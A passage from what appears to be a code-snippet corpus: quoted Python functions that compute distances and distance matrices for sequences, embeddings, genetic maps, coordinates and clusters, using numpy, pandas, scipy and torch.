lambda v: 1 if v==right_val else 0\n right_mat = np.vectorize(right_func)(trinary_mat)\n # Count the number of occurrences of this combination of values\n # by doing a matrix multiply\n new_mat = np.matmul(left_mat, right_mat)\n # Multiply by the squared distance between the values\n squared_distance = (left_val - right_val)**2\n new_mat = new_mat*squared_distance\n # Accumulate the result\n result_mat = result_mat + new_mat\n # Convert to dataframe\n result_mat = np.vectorize(lambda v: np.sqrt(v)) (result_mat)\n self.df_distance = pd.DataFrame(result_mat, columns=self.columns,\n index=self.columns)", "def dist_mat(objs: t.Union[t.Sequence[nx.Graph], t.Sequence[t.Collection[SeqGene]]], n_jobs: int = 10) -> np.ndarray:\n if isinstance(objs[0], nx.Graph):\n dist = graph_dist\n else:\n dist = seq_dist\n size = len(objs)\n base = np.zeros(shape=(size, size))\n staged_data = []\n for i in range(size):\n for j in range(size):\n if i <= j:\n staged_data.append((i, objs[i], j, objs[j]))\n staged_data = tqdm(\n staged_data,\n desc='Distance matrix')\n\n with Pool(n_jobs) as workers:\n distances = workers.starmap(dist, staged_data)\n for i, j, d in distances:\n base[i][j] = d\n base[j][i] = d\n return base", "def point_distances(src_points, gt_points):\n distances = EuclideanDistances(np.matrix(src_points), np.matrix(gt_points))\n return np.array(distances)", "def nb_tcrdist(seq_vec1, seq_vec2, distance_matrix=tcr_nb_distance_matrix, dist_weight=3, gap_penalty=4, ntrim=3, ctrim=2, fixed_gappos=True):\n q_L = seq_vec1.shape[0]\n s_L = seq_vec2.shape[0]\n if q_L == s_L:\n \"\"\"No gaps: substitution distance\"\"\"\n tmp_dist = 0\n for i in range(ntrim, q_L - ctrim):\n tmp_dist += distance_matrix[seq_vec1[i], seq_vec2[i]]\n return tmp_dist * dist_weight\n\n short_len = min(q_L, s_L)\n len_diff = abs(q_L - s_L)\n if fixed_gappos:\n \"\"\"If we are not aligning, use a fixed gap position relative to the start of the CDR3\n that reflects the typically longer and more variable-length contributions to\n the CDR3 from the J than from the V. For a normal-length\n CDR3 this would be after the Cys+5 position (ie, gappos = 6; align 6 rsds on N-terminal side of CDR3).\n Use an earlier gappos if lenshort is less than 11.\"\"\"\n min_gappos = min(6, 3 + (short_len - 5) // 2)\n max_gappos = min_gappos\n else:\n \"\"\"The CYS and the first G of the GXG are 'aligned' in the beta sheet\n the alignment seems to continue through roughly CYS+4\n ie it's hard to see how we could have an 'insertion' within that region\n gappos=1 would be a insertion after CYS\n gappos=5 would be a insertion after CYS+4 (5 rsds before the gap)\n the full cdr3 ends at the position before the first G\n so gappos of len(shortseq)-1 would be gap right before the 'G'\n shifting this back by 4 would be analogous to what we do on the other strand, ie len(shortseq)-1-4\"\"\"\n min_gappos = 5\n max_gappos = short_len - 1 - 4\n while min_gappos > max_gappos:\n min_gappos -= 1\n max_gappos += 1\n min_dist = -1\n # min_count = -1\n for gappos in range(min_gappos, max_gappos + 1):\n tmp_dist = 0\n # tmp_count = 0\n remainder = short_len - gappos\n for n_i in range(ntrim, gappos):\n \"\"\"n_i refers to position relative to N term\"\"\"\n # print (n_i, shortseq[i], longseq[i], distance_matrix[shortseq[i]+longseq[i]])\n tmp_dist += distance_matrix[seq_vec1[n_i], seq_vec2[n_i]]\n # tmp_count += 1\n #print('sequence_distance_with_gappos1:', gappos, remainder, dist[seq_i])\n for c_i in range(ctrim, remainder):\n \"\"\"c_i refers to position relative to C term, counting upwards from C term\"\"\"\n tmp_dist += distance_matrix[seq_vec1[q_L - 1 - c_i], seq_vec2[s_L - 1 - c_i]]\n # tmp_count += 1\n #print('sequence_distance_with_gappos2:', gappos, remainder, dist[seq_i])\n if tmp_dist < min_dist or min_dist == -1:\n min_dist = tmp_dist\n # min_count = tmp_count\n if min_dist == 0:\n break\n \"\"\"Note that weight_cdr3_region is not applied to the gap penalty\"\"\"\n return min_dist * dist_weight + len_diff * gap_penalty", "def _compute_snp_distances(self, task):\n genetic_map = task[\"genetic_map\"]\n temp = task[\"snps\"]\n\n # merge genetic map for this chrom\n temp = pd.concat([temp, genetic_map], ignore_index=False, sort=True)\n\n # sort based on pos\n temp = temp.sort_values(\"pos\")\n\n # fill recombination rates forward\n temp[\"rate\"] = temp[\"rate\"].fillna(method=\"ffill\")\n\n # assume recombination rate of 0 for SNPs upstream of first defined rate\n temp[\"rate\"] = temp[\"rate\"].fillna(0)\n\n # get difference between positions\n pos_diffs = np.ediff1d(temp[\"pos\"])\n\n # compute cMs between each pos based on probabilistic recombination rate\n # https://www.biostars.org/p/123539/\n cMs_match_segment = (temp[\"rate\"] * np.r_[pos_diffs, 0] / 1e6).values\n\n # add back into temp\n temp[\"cMs\"] = np.r_[0, cMs_match_segment][:-1]\n\n temp = temp.reset_index()\n\n # use null `map` values to find locations of SNPs\n snp_indices = temp.loc[temp[\"map\"].isnull()].index\n\n # use SNP indices to determine boundaries over which to sum cMs\n start_snp_ix = snp_indices + 1\n end_snp_ix = np.r_[snp_indices, snp_indices[-1]][1:] + 1\n snp_boundaries = np.c_[start_snp_ix, end_snp_ix]\n\n # sum cMs between SNPs to get total cM distance between SNPs\n # http://stackoverflow.com/a/7471967\n c = np.r_[0, temp[\"cMs\"].cumsum()][snp_boundaries]\n cM_from_prev_snp = c[:, 1] - c[:, 0]\n\n temp = temp.loc[temp[\"map\"].isna()]\n\n # add back into temp\n temp[\"cM_from_prev_snp\"] = np.r_[0, cM_from_prev_snp][:-1]\n\n # restore index\n temp = temp.set_index(\"index\")\n\n return pd.DataFrame(temp[\"cM_from_prev_snp\"])", "def seq_dist(i1: int, s1: t.Collection[SeqGene],\n i2: int, s2: t.Collection[SeqGene]) -> t.Tuple[int, int, float]:\n m1, m2 = map(\n lambda s: dict(chain.from_iterable(\n ((pos, aa) for pos, aa in zip(g.Pos, g.Seq)) for g in s)),\n [s1, s2])\n d = 0.\n for p in set(m1) | set(m2):\n if p in m1 and p in m2 and m1[p] == m2[p]:\n continue\n d += 1\n return i1, i2, d", "def computeCDR3PWDist(seqs, gap_open=3, gap_extend=3, matrix=parasail.blosum62, useIdentity=False):\n cache = CachedNWDistance(seqs, matrix=matrix, gap_open=gap_open, gap_extend=gap_extend, useIdentity=useIdentity)\n\n indices = cache.indices()\n L = indices.shape[0]\n pwdist = np.nan * np.zeros((L, L))\n \n for i, j in itertools.product(range(L), range(L)):\n \n if i <= j:\n d = cache.metric(indices[i], indices[j])\n pwdist[i, j] = d\n pwdist[j, i] = d\n\n pwdist = pd.DataFrame(pwdist, columns=cache.elements, index=cache.elements)\n return pwdist", "def distance_matrix(cities):\n\n return [[city1.distance(city2) for city2 in cities]\n for city1 in cities]", "def get_closeness(pats,seq_dict,isdiagonal=False,log=False):\n similarities= np.zeros((len(pats),len(pats)))\n intersectCount = np.zeros((len(pats),len(pats)))\n for i,patI in enumerate(pats):\n seqsI=list(zip(*seq_dict[patI]))[1]\n for j,patJ in enumerate(pats):\n seqsJ=list(zip(*seq_dict[patJ]))[1]\n if isdiagonal and i!=j: continue\n if j>i: continue\n if i==j and len(seqsI) < clim:\n similarities[i][j]=0\n continue\n keys1=set(list(zip(*seq_dict[pats[i]]))[0])\n keys2=set(list(zip(*seq_dict[pats[j]]))[0])\n intersectCount[i][j] = len(list(keys1 & keys2))\n random_score=get_random_score(seqsI,seqsJ,nsample=10)\n identical_score=get_identical_score(seqsI,seqsJ)\n score=0.0\n norm=0\n if mixvec:\n vecI=_seqs2vec(seqsI)\n vecJ=_seqs2vec(seqsJ)\n score=get_subscore_mixvec(vecI,vecJ)\n else:\n score=get_subscore_pairwise(list(seqsI),list(seqsJ)) \n print \"idscore (max):\", round(identical_score,4), \"randscore (min):\", round(random_score,4), \"score:\", round(score,4)\n if log: similarity = -math.log(1-((float(score)-float(random_score))/(float(identical_score)-float(random_score))))\n else: similarity = ((float(score)-float(random_score))/(float(identical_score)-float(random_score)))\n similarities[i][j]= similarity\n similarities[j][i]= similarity\n print patI,patJ,similarity\n dfDists=pd.DataFrame(similarities,columns=pats,index=pats)\n dfCount=pd.DataFrame(intersectCount,columns=pats,index=pats)\n return dfDists, dfCount", "def _data_labels_distance(self, samples, tfidf_dict, distance_metric='cosine'):\n \n def distance_fn(x):\n return sklearn.metrics.pairwise.pairwise_distances(\n x, x[0], metric=distance_metric).ravel() * 100\n\n base_doc_vector = np.fromiter(tfidf_dict.values(),float)\n base_doc_keys = list(tfidf_dict.keys())\n vectors = [base_doc_vector]\n for sample in samples:\n sample_vector = np.zeros(len(base_doc_keys))\n for token in sample.split():\n token_index = base_doc_keys.index(token)\n sample_vector[token_index] = base_doc_vector[token_index]\n vectors.append(sample_vector)\n\n\n distances = distance_fn(sp.sparse.csr_matrix(vectors))\n return np.array(vectors), distances", "def __build_distance_matrix(self):\n for i in range(0, len(self.__corpus)):\n doc_i = self.__corpus[i]\n for j in range(i + 1, len(self.__corpus)):\n doc_j = self.__corpus[j]\n distance = doc_i.calc_distance(doc_j)\n self.__distance_matrix.append(distance)", "def test_sequence_dist_all_metrics(metric):\n unique_seqs = np.array([\"AAA\", \"ARA\", \"AFFFFFA\", \"FAFAFA\", \"FFF\"])\n seqs2 = np.array([\"RRR\", \"FAFA\", \"WWWWWWW\"])\n dist_mat = ir.ir_dist.sequence_dist(unique_seqs, metric=metric, cutoff=8, n_jobs=2)\n assert dist_mat.shape == (5, 5)\n\n dist_mat = ir.ir_dist.sequence_dist(\n unique_seqs, seqs2, metric=metric, cutoff=8, n_jobs=2\n )\n assert dist_mat.shape == (5, 3)", "def get_distance(route, dists):\n cost = 0\n if route[0] != route[-1]:\n route.append(route[0])\n\n for i in range(len(route)-1):\n cost += dists[route[i], route[i+1]]\n # cost += dists[route[-1], route[0]]\n return cost", "def cluster_correlations(corr_mat, indices=None):\n if indices is None:\n X = corr_mat.values\n d = sch.distance.pdist(X)\n L = sch.linkage(d, method='complete')\n indices = sch.fcluster(L, 0.5 * d.max(), 'distance')\n columns = [corr_mat.columns.tolist()[i]\n for i in list((np.argsort(indices)))]\n corr_mat = corr_mat.reindex(columns=columns).reindex(index=columns)\n return corr_mat, indices", "def _derive_euclidean_dm(self, cat_mat, dim):\r\n res_mat = []\r\n\r\n for i in range(dim):\r\n res_mat.append([0 for k in range(dim)])\r\n for j in range(i):\r\n res_mat[i][j] = self._vector_dist(cat_mat[i], cat_mat[j])\r\n res_mat[j][i] = res_mat[i][j]\r\n\r\n return DistanceMatrix(res_mat, self.DistanceMatrices[0].ids)", "def compute_distances(src):\n rr = np.vstack((src[0]['rr'][src[0]['inuse'].astype(np.bool)],\n src[1]['rr'][src[1]['inuse'].astype(np.bool)]))\n return distance.squareform(distance.pdist(rr))", "def _distance(pts: npt.ArrayLike, stacked: bool = True) -> float:\n if np.ma.isMaskedArray(pts):\n pts = pts.data\n if not stacked:\n pts = np.transpose(pts)\n nrow, ncol = pts.shape\n result = np.sqrt(np.sum(pts.T @ pts * np.identity(ncol)) / nrow)\n return result", "def getDist(ind1,ind2,distMat):\n return distMat[ind1,ind2]", "def calculate_pairwise_distances(embeddings, flag_gpu):\r\n\r\n # calculate some useful variables\r\n batch_size = embeddings.size()[0]\r\n\r\n # calculate squared pairwise distances\r\n pairwise_distances = torch.add(\r\n torch.sum(embeddings ** 2, dim = 1, keepdim=True),\r\n torch.sum(embeddings.t() ** 2, dim = 0, keepdim=True)) - \\\r\n 2.0 * torch.mm(embeddings, embeddings.t())\r\n \r\n # deal with numerical inaccuracies\r\n zero_matrix = torch.zeros_like(pairwise_distances)\r\n if flag_gpu:\r\n zero_matrix = zero_matrix.cuda()\r\n pairwise_distances = torch.max(pairwise_distances, zero_matrix)\r\n\r\n # clear diagonal values\r\n one_matrix = torch.ones_like(pairwise_distances)\r\n if flag_gpu:\r\n one_matrix = one_matrix.cuda()\r\n eye_matrix = torch.eye(batch_size)\r\n if flag_gpu:\r\n eye_matrix = eye_matrix.cuda()\r\n mask_offdiagonal = one_matrix - eye_matrix\r\n pairwise_distances = pairwise_distances * mask_offdiagonal\r\n\r\n return pairwise_distances", "def calc_distances(ftr, prfx=None):\n print(time.asctime(), ' Computing distances')\n start = time.time()\n dst = util.compute_pair_distances(ftr)\n end = time.time()\n print(time.asctime(), ' Done Computing distances in ', end-start, ' seconds', flush=True)\n\n # Only save if requested (this can be a very large file)\n if prfx is not None:\n np.save('mat_' + prfx, dst)\n\n return dst", "def test_matrix_distance(self):\n # note that the score matrix must contain 'diagonal' elements m[i][i]\n # to avoid failure when the sequences match.\n m = {\"U\": {\"U\": 0, \"C\": 1, \"A\": 5}, \"C\": {\"C\": 0, \"A\": 2, \"G\": 4}}\n self.assertEqual(self.RNA(\"UUUCCC\").matrix_distance(\"UCACGG\", m), 14)\n self.assertEqual(self.RNA(\"UUUCCC\").matrix_distance(\"\", m), 0)\n self.assertEqual(self.RNA(\"UUU\").matrix_distance(\"CAC\", m), 7)\n self.assertRaises(KeyError, self.RNA(\"UUU\").matrix_distance, \"CAG\", m)", "def _computeDistances(self) -> None:\n length = len(self.data)\n for i, sequenceOne in enumerate(self.data):\n print(f\"[SeqCluBaselineOffline] Computing distances is at iteration {i} of {length}.\")\n for j, sequenceTwo in enumerate(self.data):\n if i == j:\n self.distances[i][j] = 0\n continue\n distance = self.distanceMeasure.calculateDistance(sequenceOne, sequenceTwo)\n self.distances[i][j] = distance\n self.distances[j][i] = distance", "def dist(a, b, i, j):\n return np.sqrt(sqrSum(a, b, i, j))", "def pairwise_distance_torch(embeddings, device):\n\n # pairwise distance matrix with precise embeddings\n precise_embeddings = embeddings.to(dtype=torch.float32)\n\n c1 = torch.pow(precise_embeddings, 2).sum(axis=-1)\n c2 = torch.pow(precise_embeddings.transpose(0, 1), 2).sum(axis=0)\n c3 = precise_embeddings @ precise_embeddings.transpose(0, 1)\n\n c1 = c1.reshape((c1.shape[0], 1))\n c2 = c2.reshape((1, c2.shape[0]))\n c12 = c1 + c2\n pairwise_distances_squared = c12 - 2.0 * c3\n\n # Deal with numerical inaccuracies. Set small negatives to zero.\n pairwise_distances_squared = torch.max(\n pairwise_distances_squared,\n torch.tensor([0.0]).to(device),\n )\n # Get the mask where the zero distances are at.\n error_mask = pairwise_distances_squared.clone()\n error_mask[error_mask > 0.0] = 1.0\n error_mask[error_mask <= 0.0] = 0.0\n\n pairwise_distances = torch.mul(pairwise_distances_squared, error_mask)\n\n # Explicitly set diagonals to zero.\n mask_offdiagonals = (\n torch.ones(\n (\n pairwise_distances.shape[0],\n pairwise_distances.shape[1],\n )\n )\n - torch.diag(torch.ones(pairwise_distances.shape[0]))\n )\n pairwise_distances = torch.mul(\n pairwise_distances.to(device),\n mask_offdiagonals.to(device),\n )\n return pairwise_distances", "def opt_dist_2d(seq, ks):\n # all chars - required 1s - minimum 0 separators\n additional_0s = len(seq) - sum(ks) - (len(ks) - 1)\n return _dp_opt_dist_2d(tuple(seq), ks, 0, 0, additional_0s)", "def compute_distances(self, X):\n #print(X.shape, self.Xtr.shape)\n dists = np.zeros((X.shape[0], self.Xtr.shape[0]))\n for i in range(X.shape[0]):\n X_r = np.tile(X[i], (self.Xtr.shape[0], 1))\n dists[i] = np.sqrt(np.sum(np.square(self.Xtr - X_r), axis = 1))\n #print(dists.shape)\n return dists", "def hit_time(tmat,start_list,targ_list,ntraj = 1000, cutoff=1000):\n \n # get state names\n nstates = tmat.shape[0]\n states = array([ii for ii in range(nstates)])\n \n times = list()\n \n for ii in range(ntraj):\n curr = choice(start_list)\n tm = 0\n while curr not in targ_list:\n weights = copy(tmat[curr, :])\n curr = discrete_dist(states, weights, nn=1)\n tm += 1\n if tm==cutoff:\n tm = nan\n break\n \n times.append(tm)\n\n return array(times)", "def get_distances(self):\n N = len(self.cells) # Number of cells\n distances = np.zeros([N, N]) # distances between cells\n positions = self.position_matrix() # positions of cells \n \n # get distances between cells (exploit symmetry between upper and lower triangular form)\n for i, position in enumerate(positions[:-1, :]): # Iterate matrix except the last one\n directions = positions[i+1:, :] - position # direction from i to j > i\n distances[i, i+1:] = np.linalg.norm(directions, axis=1) # length of directions\n \n return distances + distances.T # Add lower triangle of matrix to upper ", "def all_distances(coords1, coords2):\r\n c1 = np.array(coords1)\r\n c2 = np.array(coords2)\r\n z = (c1[:, None, :] - c2[None, :, :]) ** 2\r\n return np.sum(z, axis=-1) ** 0.5", "def get_dist(ind_id, sim_id):\n x, y = _get_pos(ind_id, sim_id)\n return (x ** 2 + y ** 2) ** 0.5", "def cal_dist(origs,dests):\n\tradius = 6371.009 # km\n\tif origs.ndim:\n\t\tlat1, lon1 = origs\n\t\tlat2, lon2 = dests\n\telse:\n\t\tlat1 = origs[0,:]\n\t\tlon1 = origs[1,:]\n\t\tlat2 = dests[0,:]\n\t\tlon2 = dests[1,:]\n\tdlat = (lat2-lat1) / 180. * np.pi\n\tdlon = (lon2-lon1) / 180. * np.pi\n\ta = np.sin(dlat/2) * np.sin(dlat/2) + np.cos(lat1 / 180. * np.pi) \\\n\t\t* np.cos(lat2 / 180. * np.pi) * np.sin(dlon/2) * np.sin(dlon/2)\n\tc = 2 * np.arctan2(np.sqrt(a), np.sqrt(1-a))\n\treturn radius * c", "def distance(self, features, targets):\n cost_matrix = np.zeros((len(targets), len(features)))\n for i, target in enumerate(targets):\n cost_matrix[i, :] = self._metric(self.samples[target], features)\n return cost_matrix", "def distance(self, features, targets):\n cost_matrix = np.zeros((len(targets), len(features)))\n for i, target in enumerate(targets):\n cost_matrix[i, :] = self._metric(self.samples[target], features)\n return cost_matrix", "def nm_dist_mat(self):\n mat = np.zeros([self.N, self.M])\n for n in range(self.N):\n for m in range(self.M):\n mat[n, m] = distance(self.N_coords[n], self.M_coords[m])\n return mat", "def calculate_dist_mat(embeddings: np.ndarray, norm: int) -> np.ndarray:\n kwargs = {'p': norm}\n condensed_dist = pdist(embeddings, metric='minkowski', **kwargs)\n dist_mat = squareform(condensed_dist)\n return dist_mat", "def _pairwise_distance(self, src_embeds, vocab_embeds, squared=False):\n # compute square norm to avoid compute all the directions\n vocab_sq_norm = vocab_embeds.norm(p=2, dim=-1) ** 2\n src_sq_norm = src_embeds.norm(p=2, dim=-1) ** 2\n\n # dot product\n dot_product = self._pairwise_dot_product(src_embeds, vocab_embeds)\n \n # reshape for broadcasting\n vocab_sq_norm = vocab_sq_norm.unsqueeze(0).unsqueeze(0) # 1, 1, vocab size\n src_sq_norm = src_sq_norm.unsqueeze(2) # batch, seq length, 1\n\n # compute squared difference\n sq_norm = vocab_sq_norm + src_sq_norm - 2 * dot_product\n if squared:\n return sq_norm\n else:\n # relu + epsilon for numerical stability\n sq_norm = F.relu(sq_norm) + 1e-20\n \n # take the square root\n return sq_norm.sqrt()", "def DistanceToIdx(A, B, idx):\n C= A[idx]\n return np.sqrt(np.sum(np.square(C-B),axis=1,keepdims=True))", "def manhattan_dist(idx, pos, n):\n\n row_dist = abs(pos // n - idx // n)\n col_dist = abs(pos % n - idx % n)\n return row_dist + col_dist", "def _get_distance_by_span(matched_positions, forms):\n if len(set(forms[matched_positions])) < 2:\n return 0\n if len(matched_positions) == 2:\n return _get_trivial_distance(matched_positions)\n start_pos = np.min(matched_positions)\n end_pos = np.max(matched_positions)\n if start_pos != end_pos:\n return np.abs(end_pos - start_pos) + 1\n return 0", "def distance_matrix (sim,polymer_text,teq,tsample,threshold=2.5) :\n u = sim.u\n polymer = u.select_atoms (polymer_text)\n N = polymer.n_atoms\n nslice = mbt.traj_nslice (u,teq,tsample)\n d = np.zeros((N,N))\n for i,ts in enumerate(u.trajectory[teq::tsample]) :\n this_d = distance_array(polymer.positions,\n polymer.positions,\n box=ts.dimensions)\n d = mbt.new_average(i,d,this_d)\n return d", "def _distanceToCluster(self, prototypeIndices: ndarray, sequenceIdx: int) -> float:\n return np.sum(self.distances[sequenceIdx][prototypeIndices])", "def get_pca_distances(components_df):\n d = pd.DataFrame()\n for name_i, srs_i in components_df.T.iteritems():\n \n for name_j, srs_j in components_df.T.iteritems():\n d.loc[name_i,name_j] = np.linalg.norm(srs_i-srs_j)\n return d", "def compute_distance(traj1, traj2, matched_pos):\n distance = np.zeros((len(matched_pos),), dtype=float)\n for i in range(len(matched_pos)):\n if matched_pos[i] == -1:\n continue\n else:\n iou = bbox_overlap(traj1[i, 2:6], traj2[matched_pos[i], 2:6])\n distance[i] = iou\n return distance", "def pairwise_squared_distances(data):\n n = data.shape[0]\n distances = np.zeros((n,n))\n for i in range(n):\n for j in range(i+1,n):\n d = data[i,:]-data[j,:]\n distances[i,j] = d@d\n distances[j,i] = distances[i,j]\n\n return distances", "def get_adjacent_distances(dist_matrix_header,\r\n dist_matrix,\r\n sample_ids,\r\n strict=False):\r\n filtered_idx = []\r\n filtered_sids = []\r\n for sid in sample_ids:\r\n try:\r\n idx = dist_matrix_header.index(sid)\r\n except ValueError:\r\n if strict:\r\n raise ValueError(\r\n \"Sample ID (%s) is not present in distance matrix\" %\r\n sid)\r\n else:\r\n pass\r\n else:\r\n filtered_idx.append(idx)\r\n filtered_sids.append(sid)\r\n\r\n if len(filtered_idx) < 2:\r\n raise ValueError(\"At least two of your sample_ids must be present in the\"\r\n \" distance matrix. %d are present.\" % len(filtered_idx))\r\n\r\n distance_results = []\r\n header_results = []\r\n for i in range(len(filtered_idx) - 1):\r\n distance_results.append(\r\n dist_matrix[filtered_idx[i]][filtered_idx[i + 1]])\r\n header_results.append(\r\n (filtered_sids[i], filtered_sids[i + 1]))\r\n return distance_results, header_results", "def distance_matrix_squared(crd1, crd2, dim=2):\n crd1 = ensure_traj(crd1)\n crd2 = ensure_traj(crd2)\n n = int(np.shape(crd1)[1] / dim)\n\n crd1_components = [\n np.tile(np.expand_dims(crd1[:, i::dim], 2), (1, 1, n)) for i in range(dim)\n ]\n crd2_components = [\n np.tile(np.expand_dims(crd2[:, i::dim], 2), (1, 1, n)) for i in range(dim)\n ]\n D2_components = [\n (crd1_components[i] - np.transpose(crd2_components[i], axes=(0, 2, 1))) ** 2\n for i in range(dim)\n ]\n D2 = np.sum(D2_components, axis=0)\n return D2", "def distance_between_gt_pred(gt_list_rad, pred_list_rad):\n\n gt_len, pred_len = gt_list_rad.shape[0], pred_list_rad.shape[0]\n ind_pairs = np.array([[x, y] for y in range(pred_len) for x in range(gt_len)])\n cost_mat = np.zeros((gt_len, pred_len))\n\n # Slow implementation\n # cost_mat = np.zeros((gt_len, pred_len))\n # for gt_cnt, gt in enumerate(gt_list_rad):\n # for pred_cnt, pred in enumerate(pred_list_rad):\n # cost_mat[gt_cnt, pred_cnt] = distance_between_spherical_coordinates_rad(gt, pred)\n\n # Fast implementation\n if gt_len and pred_len:\n az1, ele1, az2, ele2 = gt_list_rad[ind_pairs[:, 0], 0], gt_list_rad[ind_pairs[:, 0], 1], \\\n pred_list_rad[ind_pairs[:, 1], 0], pred_list_rad[ind_pairs[:, 1], 1]\n cost_mat[ind_pairs[:, 0], ind_pairs[:, 1]] = distance_between_spherical_coordinates_rad(az1, ele1, az2, ele2)\n\n row_ind, col_ind = linear_sum_assignment(cost_mat)\n cost = cost_mat[row_ind, col_ind].sum()\n return cost", "def seqmat2align(smat,index=None):\n if index is None:\n index = np.arange(smat.shape[0])\n return pd.Series([''.join(smat[seqi,:].astype(str)) for seqi in np.arange(smat.shape[0])], name='seq', index=index)", "def test_sum_of_distances(self):\n N = 10\n centers = [[0, 0], [1, 0], [0.5, np.sqrt(0.75)]]\n cluster_std = [0.3, 0.3, 0.3]\n n_samples = int(0.75 * N)\n data, labels_true = \\\n sklearn.datasets.make_blobs(n_samples=n_samples,\n centers=centers,\n cluster_std=cluster_std)\n centers = [[0.5, np.sqrt(0.75)]]\n cluster_std = [0.3]\n extra, labels_true = \\\n sklearn.datasets.make_blobs(n_samples=int(0.25 * N),\n centers=centers,\n cluster_std=cluster_std)\n X = np.concatenate((data, extra), axis=0)\n N = X.shape[0]\n\n # Pick some random floats for the counts/weights:\n counts = np.random.random_sample((N,)) * 10\n\n # SciPy:\n Y = pdist(X, metric=cdist)\n weights = [counts[i] * counts[j]\n for i in xrange(N - 1) for j in xrange(i + 1, N)]\n scipy_sum = np.sum(weights * Y)\n N = counts.sum()\n N_unique_pairs = N * (N - 1.0) / 2.0\n scipy_mean = scipy_sum / N_unique_pairs\n\n # C & Cython:\n c_mean = c_mean_dist(X, counts)\n\n # There is minor rounding error, but check for equality:\n self.assertTrue(np.isclose(c_mean, scipy_mean))\n # Even though above is comparing the means, it is actually checking the\n # sums are correct as the means are calculated in the same way, i.e.,\n # by dividing by the same number, N_unique_pairs.", "def pairwise_cosine(mat):\n def cosine_similarity(a, b):\n return (a * b).sum() / (np.linalg.norm(a) * np.linalg.norm(b))\n\n n = len(mat)\n dist_mat = np.zeros((n, n))\n for i in range(n):\n for j in range(i + 1, n):\n dist = cosine_similarity(mat[i], mat[j])\n dist_mat[i, j] = dist\n dist_mat[j, i] = dist\n\n dist_mat[np.isnan(dist_mat)] = 0\n\n return dist_mat", "def getDistanceMatrix(self, alignedSequences):\n\t\tif not alignedSequences:\n\t\t\traise ValueError(\"alignedSequences must not be empty\")\n\t\tdominantAlignedSequence = alignedSequences[0]\n\t\tsubdominantAlignedSequences = alignedSequences[1:]\n\t\tdistanceMatrix = []\n\t\tfor seq in subdominantAlignedSequences:\n\t\t\tdistanceMatrix.append(len(seq) - self._getNumberOfSpaces(seq) - self._getNumberOfAlignedNucleotides(dominantAlignedSequence, seq))\n\t\treturn distanceMatrix", "def get_generalized_targets_distances(generalized_targets, board):\n representative = generalized_targets[0]\n sm = 0\n for i in range(1, len(generalized_targets)):\n cur_gen_target = generalized_targets[i]\n sm += representative.get_distance(board, cur_gen_target)\n return sm", "def pairwise_distance(M, d, axis=0):\n\n return squareform(pdist(M if axis==0 else M.T, d))", "def _compute_distances(self, atoms: List[CellAtom]):\n muon = self._cell_atoms[self._muon_index]\n\n for atom in atoms:\n atom.distance_from_muon = np.linalg.norm(muon.position - atom.position)", "def DTWDistance(s1, s2):\n len_s1 = len(s1)\n len_s2 = len(s2)\n\n _dtw_mat = np.empty([len_s1, len_s2])\n _dtw_mat[0, 0] = abs(s1[0] - s2[0])\n\n # two special cases : filling first row and columns\n\n for j in range(1, len_s2):\n dist = abs(s1[0] - s2[j])\n _dtw_mat[0, j] = dist + _dtw_mat[0, j - 1]\n\n for i in range(1, len_s1):\n dist = abs(s1[i] - s2[0])\n _dtw_mat[i, 0] = dist + _dtw_mat[i - 1, 0]\n\n #  filling the matrix\n for i in range(1, len_s1):\n for j in range(1, len_s2):\n dist = abs(s1[i] - s2[j])\n _dtw_mat[(i, j)] = dist + min(\n _dtw_mat[i - 1, j], _dtw_mat[i, j - 1], _dtw_mat[i - 1, j - 1]\n )\n\n return _dtw_mat[len_s1 - 1, len_s2 - 1]", "def pairwise(self, arr_x, mat_y):\n n, h = mat_y.shape\n x = np.tile(arr_x, (n, 1)) # become nxh\n x_big = x >= mat_y\n difference = x-mat_y\n big_sum = (x_big * difference).sum(axis=1) # n\n small_sum = ((1-x_big) * (-difference)).sum(axis=1)\n sum_ = (big_sum ** self.p + small_sum ** self.p)\n dist = sum_ ** (1/self.p)\n\n if self.normalize:\n stack = np.stack((x, mat_y, difference), 0)\n stack = np.abs(stack)\n m = stack.max(0).sum(-1)\n dist /= m\n return dist", "def test_distance_indices(self):\n s1 = self.RNA(\"AUGC\")\n s2 = self.RNA(\"AAGC\")\n\n def f(x, y):\n if x == 2 or y == 2:\n return 10\n return 0\n\n self.assertEqual(s1.distance(s2, f, use_indices=True), 20)", "def compute_distances(self):\n if self.df is None:\n return\n\n self.origdist = []\n self.transdist = []\n for i in range(len(self.df)):\n for j in range(i+1, len(self.df)):\n self.origdist.append(distance(self.df['LPsol'].iloc[i], self.df['LPsol'].iloc[j]))\n self.transdist.append(distance(self.df[['x', 'y']].iloc[i], self.df[['x', 'y']].iloc[j]))", "def dist_chord(datamtx, strict=True):\n if strict:\n if not all(isfinite(datamtx)):\n raise ValueError(\"non finite number in input matrix\")\n if rank(datamtx) != 2:\n raise ValueError(\"input matrix not 2D\")\n numrows, numcols = shape(datamtx)\n else:\n try:\n numrows, numcols = shape(datamtx)\n except ValueError:\n return zeros((0,0),'d')\n\n if numrows == 0 or numcols == 0:\n return zeros((0,0),'d')\n dists = zeros((numrows,numrows),'d')\n for i in range(numrows):\n r1 = datamtx[i] # cache here\n r1norm = norm(r1)\n for j in range(i):\n r2 = datamtx[j]\n r2norm = norm(r2)\n if r1norm == 0.0 or r2norm == 0.0:\n if r1norm == 0.0 and r2norm == 0.0:\n dist = 0.0\n else: dist = 1.0\n else:\n dist = norm(r1/r1norm - r2/r2norm)\n dists[i,j] = dists[j,i] = dist\n\n return dists", "def calc_distance(\n target_batch_keys, target_keys_pred, batch_assignments_gt, src_key_num_gt\n):\n batch_keys_gt = torch.bmm(batch_assignments_gt, target_batch_keys[:, :, :2])\n err = distance(target_keys_pred, batch_keys_gt, src_key_num_gt)\n return err", "def clustal_omega_distance_matrix(seqrecs, **kwargs):\n\n def commandline(ft, **kwargs):\n with tempfile.NamedTemporaryFile(delete=False, mode=\"w\") as ft_out:\n cline = ClustalOmegaCommandline(\n \"clustalo\",\n infile=ft.name,\n force=True,\n distmat_out=ft_out.name,\n distmat_full=True,\n distmat_full_iter=True,\n )\n stdout, stderr = cline()\n df = pd.read_csv(ft_out.name, delim_whitespace=True, skiprows=1, header=None, index_col=0)\n df.index.name = \"seqid\"\n return df\n\n return _generic_aligner_commandline_file(commandline, seqrecs, **kwargs)", "def calc_dist_matrix(self,verbose=False):\n\n print(\"Calculating distance matrix.\"); sys.stdout.flush()\n\n nrow = self.data_vector.shape[0]\n self.dist_matrix = np.zeros((nrow, nrow),dtype=float)\n for i in range(nrow):\n if verbose:\n if i % 1000 == 0:\n print(\"Row\",i,\"of\",nrow)\n 